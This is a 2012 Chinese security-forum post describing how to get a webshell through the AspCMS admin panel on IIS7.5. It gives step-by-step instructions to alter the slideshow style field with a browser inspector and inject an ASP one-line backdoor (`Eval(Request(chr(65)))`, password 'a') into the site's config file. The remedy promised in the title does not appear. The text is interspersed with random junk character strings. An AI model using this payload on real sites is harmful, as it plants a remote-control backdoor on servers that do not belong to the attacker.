找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2192|回复: 0
打印 上一主题 下一主题

aspcms后台拿shell漏洞(非添加模块)及修复方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:55:05 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法." u8 A, E+ x$ t
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
7 b0 L. M* }- \( y: r
: d* [6 C! e  X3 X5 X' }& K
' b( y, S9 u- z, z1 V! F" z+ O
% H8 j0 g1 ?$ K; K2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
# z' _/ w0 u# n: S9 {
" w1 X: s/ P  I- Y2 X* I9 f9 v2 S; ~5 M) |
3、一句话木马,密码a。在/config/AspCms_Config.asp
6 D. W; u6 b! ~2 G6 O; |/ A# a+ y2 h8 P, V5 \$ M
$ H4 m1 K$ W5 P: T" i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表